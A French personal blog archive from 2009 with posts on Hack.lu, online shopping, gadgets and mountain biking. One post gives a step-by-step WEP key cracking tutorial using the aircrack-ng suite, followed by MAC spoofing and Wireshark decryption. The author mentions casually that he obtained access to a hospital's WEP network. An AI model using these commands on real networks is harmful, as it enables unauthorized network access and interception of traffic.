Skip to main content
KAIZER ONION

Year: 2009

Hack.lu, la defcon Luxembourgeoise

Comme chaque année en octobre, c’est la grande messe de la sécurité informatique qui se déroule le 28-30 Octobre à  Luxembourg. Pour la deuxième année consécutive, dartalis (mon employeur) sponsorise l’événement.
Cette année s’annonce être un bon cru au vu des speakers retenus par les membres de l’association. Pour en citer quelques uns, il y aura Matt Suiche avec une présentation intéressante de son outil win32dd qui permet de faire un dump de la mémoire physique de votre windows vista. Il y aura aussi le duo Daniele Bianco et Andrea Barisani avec leur présentation sur l’émanation d’ondes des claviers. Notons également la présence de Saumil Shah qui l’année passée avait fait une superbe présentation sur la sécurité des navigateurs web. Le premier jour de la conférence sera dédié aux Workshops, avec deux sessions simultanées. La première, Bypassing the Perimeter: Client Side Exploitation sera présenté par Nitesh Dhanjani et Billy K Rios, et la seconde parlera de DAVIX Visualisation et sera présenté par Jan P. Monsch.
Maintenant le mieux pour se faire un avis c’est d’y participer, alors rdv là  bas !! En attendant vous pouvez suivre les news sur leur site web : hack.lu ou comme moi sur twitter

MacWay

Ce n’est pas à  mon habitude de faire de la publicité pour un shop en ligne mais sur le coup je trouve qu’il est bon de partager mon expérience MacWay avec vous. Pour info, MacWay est un magasin en ligne qui revend des produits informatiques et électroniques innovants en l’occurrence ils sont spécialisé dans le stockage.
Ayant comme projet d’investir dans un disque dur NAS de marque Synology, j’ai trouvé mon bonheur sur leur site avec le produit DS209. Donc j’effectue ma commande le 04/09/2009, en voici le résumé :

Commande chez MacWay
Commande chez MacWay

En créant un compte chez MacWay comme beaucoup d’autre site de commerce en ligne, vous pouvez vous abonner à  leur Newsletter. Ce matin, je reçois une newsletter de MacWay avec comme sujet : “MacWay Expo 2009, l’événement promotionnel de l’année !”. Vous vous imaginez bien que CTRL+T macway CTRL+ENTER ont été les commandes suivant la lecture du mail. A ma grande surprise, les articles que j’avais commandé quelques jours auparavant étaient en promotion. De plus, pour tout achat dépassant 499 euros un disque dur Storeva Essential 250 Go est offert.

Macway commande
Macway commande

A ce moment précis, je l’avais un peu mauvaise surtout que ma commande n’était pas encore parti (10 jours d’attente sur le DS209). Heureusement, chez MacWay les factures sont payables à  l’expédition du matériel. Je me dit tout n’est pas perdu, j’envoie un mail au service clientèle en leur expliquant mon cas et dans la demi heure l’affaire était réglée. Je bénéficiais de la remise du jour avec en cadeau le disque dur. Alors moi je dis BRAVO … et merci à  MacWay.

Twitter was down

La fin du monde est arrivée, 64 ans après l’explosion de la première bombe atomique. Il semblerait qu’un groupe de pirate a effectué un DoS (Deni of Service) sur les serveurs de Twitter. Je dois avouer que hier je me suis senti un peu coupé du monde. Comment partager aussi rapidement et massivement mes dernières infos, impressions, humeurs avec le monde. La seule fonctionnalité non touché par l’attaque était Twitter search. Ceci dit, cela nous a permis d’être spectateur de l’attaque sans pour autant pouvoir agir. A croire que cela était fait exprès, digne du Marquis de Sade.

Je me suis dit qu’il pouvait être utile d’avoir un plan de secours des activités possible lorsque Twitter n’est plus là  :
0. Travailler
1. Discuter à  propos de Twitter sur FriendFeed
2. Discuter à  propos de Twitter sur Facebook
3. Discuter à  propos de Twitter sur MSN
4. Laisser un commentaire sur un blog au sujet de Twitter
5. Discuter de Twitter via SMS
6. Discuter de Twitter via Mail
7. Ecrire un article sur Twitter
8. Penser à  propos de Twitter
9. Rêver aux prochains tweets que vous allez poster
10. Sortir dehors

Si vous avez d’autres idées, n’hésitez pas.

Mise à  jour le 08/08/2009 10:27

Be a Hero

Après mon séjour au Mondial du VTT aux 2 Alpes, je suis revenu avec une idée en tête : “Acheter une caméra embarquée”.
Désormais, c’est chose faite. Il s’agit de la caméra GoPro. Facile à  utiliser et à  fixer, voici dans les grandes lignes les qualités techniques de la bête :

  • Résolution: 5 megapixel (2592×1944) photo, 512×384 video
  • Format vidéo: MJPEG, 30 images/seconde
  • Optique: optique en verre, f/2.8 ouverture, avec un angle de vue de 170º
  • Modes: vidéo, standard photo, photo toute les 2 ou 5 secondes, 3 photos en 1 seconde en mode rafale, retardateur, possibilité d’inverser la prise de vue
  • Retardateur: 10 secondes
  • Micro: intégré mais pas terrible
  • Format audio: 8kHz, mono
  • Memoire: 16 MB interne, extensible à  4GB avec une SD (soit 110 minutes d’enregistrement)
  • Capacité: 56 minutes de vidéo ou 1,945 photos avec une SD de 2GB. Et 1h52min de vidéo avec une SD de 4GB.
  • Alimentation: 2x AAA batteries pour 3heures d’enregistrement avec des piles au lithium
  • Connexion TV (avec cabe RCA): NTSC ou PAL
  • Connexion PC: USB + RCA combo cable
  • Compatible avec: Windows ME, 2000, XP, et Vista; Mac OS X 10.2 et plus
  • Waterproof: jusqu’à  30 mètres
  • Dimensions: 4.45cm x 5.84cm x 3.18cm (H x L x P)
  • Poids: 139 g

Personnellement, je l’ai acheté sur eBay.com pour le prix de 148 euros TTC frais de port compris. Si vous êtes intéressé, le vendeur en a encore à  cette adresse.

GoPro Hero Wide
Le soir même de la reception du colis, je n’ai pu m’empêcher d’aller essayer mon nouveau joujou … Pour le coup, j’étais un peu trop préssé et le cadrage n’était pas au top mais cela m’a permit de visualiser la qualité de la caméra. Je vous laisse regarder cette petite vidéo en moto.

https://youtube.com/watch?v=hDuUb5Sgsao%26hl%3Dfr%26fs%3D1%26

Une fois testé sur la moto, il a fallu que je teste sur le vélo. Accompagné de Matt et Bruno pour un ride sans prise de tête. Je tiens à  préciser que vous allez voir mon premier passage sur le Road Gap de la descente d’Algrange. Pour les personnes qui ne connaissent pas, c’est un saut au dessus d’un passage de voiture.

https://youtube.com/watch?v=rAwPmGpSLpE%26hl%3Dfr%26fs%3D1%26

Et une voici la seconde vidéo, cette fois complète, de la descente d’Algrange.

https://youtube.com/watch?v=727m278pVq8%26hl%3Dfr%26fs%3D1%26

Si vous avez des remarques, n’hésitez pas.

Wifi / Hara-kiri (Seppuku)

Cette semaine j’ai été surpris d’apercevoir, dans un centre hospitalier, un spot wifi (professionnel) avec du WEP. Même si il y avait du filtrage par adresse mac et le service DHCP était coupé, cela m’a pris quelques minutes supplémentaires pour obtenir toutes les informations nécessaires à  la connexion de ce réseau… Alors je me suis dit qu’un petit rappel sur la sécurité des réseaux wifi pourrait être utile afin d’éviter l’hara-kiri.

Actuellement nous avons les différents types d’authentification suivants :

  • WEP Open ou Shared Key
  • WPA PSK avec encryption TKIP ou AES
  • WPA Enterprise avec encryption TKIP ou AES
  • WPA2 PSK avec encryption TKIP ou AES
  • WPA2 Enterprise avec encryption TKIP ou AES
  • 802.1x

Sur ces différents modes d’authentification, il y a bien entendu le WEP qui est complètement obsolète, et le protocole d’encryption TKIP qui contient des faiblesses découvertes par deux chercheurs allemands en novembre 2008.
Je ne vais pas refaire une biographie complète du WEP car il en existe déjà  beaucoup sur internet. Mais je vais vous montrer (à  nouveau car pour certain ce n’est pas clair visiblement) comment il est facile de casser une clé WEP.

Personnellement j’utilise le live CD backtrack 4 qui contient tous les outils nécessaires pour notre démo.

Pour la suite de la démonstration, on prendra pour acquis les éléments suivants :

  • MAC adresse du point d’accès cible : 00:CA:FE:BA:BE:FF
  • MAC adresse du client connecté sur le point d’accès : 00:BA:BE:CA:FE:FF
  • BSSID du point d’accès cible : POVWEP
  • Dans un premier temps, je mets ma carte wifi en mode monitor :

    airmon-ng start wlan0

    Puis je lance airodump-ng, il permet de scanner les réseaux wifi. Airodump-ng est simple d’utilisation.

    Usage: airodump-ng

    Airodump-ng offre une multitude d’options et de filtres afin de cibler ce que l’on souhaite surveiller.

    Options airodump-ng:

    -w permet de créer un fichier de capture dans lequel seront enregistrés tous les paquets.
    Exemple: airodump-ng -w out wlan0

    –encrypt permet de filtrer les réseaux en fonction du type d’encryption utilisé.
    Exemple: airodump-ng –encrypt wep wlan0 (seuls les réseaux en WEP seront affichés)

    -c permet de cibler l’écoute sur un canal wifi particulier.
    Exemple: airodump-ng -c 10 wlan0 (airodump-ng n’écoutera que le canal 10)

    –bssid permet de ne cibler qu’un seul point d’accès en fonction de son adresse mac.
    Exemple: airodump-ng –bssid 00:CA:FE:BA:BE:FF wlan0 (airodump-ng ne surveillera que le point d’accès dont l’adresse mac est 00:CA:FE:BA:BE:3F)

    Donc si je veux faire un tour d’horizon ce que qui ce passe dans le coin, je lance :

    airodump-ng wlan0

    Je peux apercevoir que le point d’accès 00:CA:FE:BA:BE:FF a du WEP et un client connecté. Parfait, nous pouvons commencer. On lance un autre airodump qui va créer un fichier de capture. Ce fichier de capture sera utilisé par aireplay pour rejouer les ARP (injections de paquets).

    airodump-ng -w out -c 10 –bssid 00:CA:FE:BA:BE:FF wlan0

    Maintenant que nous sommes focalisé sur notre point d’accès et que nous avons un client connecté, nous pouvons tenter de nous associer au point d’accès avec aireplay :

    aireplay-ng

    Voici les différentes options de aireplay :

    –deauth count : deauthenticate 1 or all stations (-0)
    –fakeauth delay : fake authentication with AP (-1)
    –interactive : interactive frame selection (-2)
    –arpreplay : standard ARP-request replay (-3)
    –chopchop : decrypt/chopchop WEP packet (-4)
    –fragment : generates valid keystream (-5)
    –caffe-latte : query a client for new IVs (-6)
    –cfrag : fragments against a client (-7)
    –test : tests injection and quality (-9)

    On utilise l’option -1 fakeauth (association & authentification) pour notre test :

    aireplay-ng -1 0 -e POVWEP -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF wlan0

    POVWEP: essid (nom du réseau wifi)

    00:CA:FE:BA:BE:FF: adresse mac du point d’accès

    00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

    wlan0: notre interface wifi

    Maintenant nous pouvons lancer notre attaque par rejeux d’ARP (injection de paquets). On utilise l’option -3 standard ARP-request replay (rejeu d’arp) :

    aireplay-ng -3 -e Livebox-a1b2 -a 00:CA:FE:BA:BE:FF -b 00:CA:FE:BA:BE:FF -h 00:BA:BE:CA:FE:FF -x 600 -r out-01.cap wlan0

    POVWEP: essid (nom du réseau wifi)

    00:CA:FE:BA:BE:FF: adresse mac du point d’accès

    00:BA:BE:CA:FE:FF: adresse mac du client (“station” sous airodump-ng)

    600: nombre de paquets par secondes qui seront injectés (à  régler en fonction de la qualité du signal wifi)

    out-01.cap: notre fichier de capture airodump-ng

    wlan0: notre interface wifi

    Il ne reste plus qu’attendre afin d’obtenir 40000 ARP pour décrypter la clé WEP. Une fois vos 40000 ARP dans votre fichier de capture, il ne reste plus qu’à  décrypter la clé à  l’aide de aircrack.

    Aircrack-ng est très simple d’utilisation.

    usage: aircrack-ng [options] <.cap / .ivs file(s)>

    Dans notre cas, nous allons utiliser la commande suivante :

    aircrack-ng out-01.cap

    Quelques minutes après vous pourrez voir :

    KEY FOUND! [ FA:E6:18:26:27:56:B5:4D:C5:31:40:71:56 ]

    Maintenant si le réseau fait du filtrage par MAC adresse vous avez déjà  un mac adresse de disponible, utilisez là  :

    ifconfig wlan0 hw ether 00:BA:BE:CA:FE:FF

    Et si le service DHCP n’est pas activé, vous pouvez utiliser wireshark afin de définir l’adressage du réseau. Commencez par lancer wireshark.
    Puis configurer wireshark pour qu’il décrypte les paquets avec la clé WEP que vous venez juste de décrypter.

    Allez dans Edit\preferences\protocols\IEEE 802.11
    puis entrer la clé WEP
    Cochez Assume packets have FCS et enable decryption

    Screenshot-Wireshark: Preferences

    Vous pouvez commencer à  sniffer en allant dans capture\options

    Screenshot-Wireshark: Capture Options

    Si vous voulez être plus granulaire dans votre recherche vous pouvez faire un filtre sur votre point d’accès :

    (wlan.bssid==00:CA:FE:BA:BE:FF) && (tcp)

    Screenshot-The Wireshark Network Analyzer

    Vous allez découvrir des choses intéressantes.

    Deux formules à  retenir (dont une que j’empreinte à  sid) :

    WPA != PSK + TKIP
    WIFI != WEP

Iphone 3G S

Lors de la grande messe d’Apple le 8 juin dernier, présenté par Phil Schiller, tous les fans étaient présents sur le net. Il aura fallu attendre plus d’une heure pour obtenir les informations croustillantes à  propos du nouvel Iphone 3G S et de son nouveau firmware. On aura eu droit à  un petit bilan sur l’iPhone et l’AppStore avec ses 50,000 applications hébergées, 40 millions d’appareils vendus et 1 milliards de téléchargements !

iphone-3g-s

Puis on attaque le vif du sujet, à  savoir le nouveau firmware 3.0 qui compte plus de 100 nouvelles fonctions. Voici un résumé des fonctions/applications présentées lors de la keynote :

  • le copier / coller
  • support du MMS mais pas chez tous les opérateurs
  • Spotlight pour la recherche sur votre iPhone
  • le contrôle parental est amélioré sur l’iPhone OS 3.0
  • Tethering vous permet de partager votre connexion internet de l’iPhone avec votre ordinateur (comme le fait déjà  pdanet)
  • le javascript (pour les sites web) marchera 3 fois plus vite sur le nouveau firmware; Autofill retient vos identifiants de connexions pour les sites web que vous utilisez (moyen en cas de vol ou perte…)
  • fonctionnalité ‘find my iPhone’ de MobileMe qui permet de localiser puis récupérer votre iPhone perdu
  • votre iPhone peut émettre un son même en mode silence si vous envoyé un message de perte à  celui-ci
  • support de la connectivité P2P. Peut être l’arrivé des jeux multi-joueurs en ligne ?

Peter-Frans Pauwels nous a présenté TomTom sur iPhone. Un point qui était très attendu. La démo de TomTom montre la pertinence du système de navigation et des algorithmes de trajet grâce au système de bousole intégré dans le nouvel iPhone 3G S.

Une application que j’ai trouvé sympa plus pour le côté clinquant que pour le côté pratique, car on ne peut pas dire que ce soit réellement pratique de pouvoir ouvrir sa voiture avec son iphone. Cependant, c’est la classe … Plus sérieusement, je demande à  voir comment fonctionne l’application car on peut imaginer des scénarios moins rigolo en terme de sécurité.

La nouvelle version du firmware (3.0) sera disponible le 17 juin gratuitement pour iPhone et 9,95$ pour iPod Touch.

Concernant le nouvel iPhone 3G S, on apprends que le S veut dire Speed car il serait 2 à  3 fois plus rapide. Cette nouvelle brique intègre une caméra de 3 Mégapixel autofocus svp !!! Avec le “tap-to-focus, vous pourrez double-cliquer sur un endroit de la photo pour zoomer. La démo de macro avec iPhone 3G S a été assez bluffant.
Une autre fonctionnalité intéressante, c’est le contrôle vocal et numérotation vocale. Une amélioration de la batterie permet d’obtenir une autonomie de 5 à  10heures. Apple joue la carte verte en n’enlevant l’Arsenic dans l’écran.

D’un point de vue financier, on aura deux variante pour l’iPhone 3G S, un 16Go pour 199$ et un 32Go pour 299$. L’iPhone 3G sera commercialisé uniquement en 8Go pour 99$.

iphone-3gs

Donc maintenant, je pense que vous avez assez d’information il ne reste plus qu’à  attendre le 19 juin, jour de la sortie du nouveau iPhone 3G S.

Enduro Series à  Metabief

Ce weekend a été sport, très sport … La saga des Enduro Series a commencée … 5 courses, 5 spots, 5 ambiances différentes. La première course été à  Metabief dans le Jura.

Arrivé jeudi à  midi dans la station de Metabief, on commence par une petite reconnaissance des pistes l’après midi. Les parcours sont physiques et techniques. On se rends vite compte que nos pneus sont trop léger pour ce genre de pratique (4 pilotes, 4 crevaisons, 3 jantes abîmées).
Fin de journée, on a fait un tour chez Bonux (Adrenalin point) le vendeur local en matos de VTT, tout le monde a fait le plein de pneus (Maxxis Minion DH en super tacky 2.35) et de chambres renforcées. Après cette première journée bien chargée, nous sommes allé nous restaurer chez Remy, au menu Tartiflette maison (Il y avait plus de Mont d’or, snif), tarte aux mures faite maison et un accueil très chaleureux. Je vous recommande l’adresse si vous passez par là  (Le grill du Chamois).

Continue reading

Paradiski

Cette année ce fut un pèlerinage tardif (contrairement au vin, la neige n’obtient pas un goût sucré) au paradis du ski : J’ai nommé “Paradiski”. Avec ces 3 stations qui regroupent 425 km de pistes. Le domaine a été aménagé pour tous les goûts ; que vous soyez branchés Free Style (5 Snowparks), Vitesse (1 piste de kilomètre lancé) ou chrono (3 boardercross). Et encore je suis sûr que je n’ai pas tout vu … Pour cette fin de saison, l’enneigement était correct. Il faut dire qu’avec une altitude qui s’échelonne entre 1200 m et 3250 m, il y a de quoi faire. Forcément, ce n’était plus de la bonne poudreuse. Le matin c’était marteau piqueur et l’après midi pot de miel. Entre 12h et 14h quand la neige commence à  se transformer on pouvait se lâcher …

Continue reading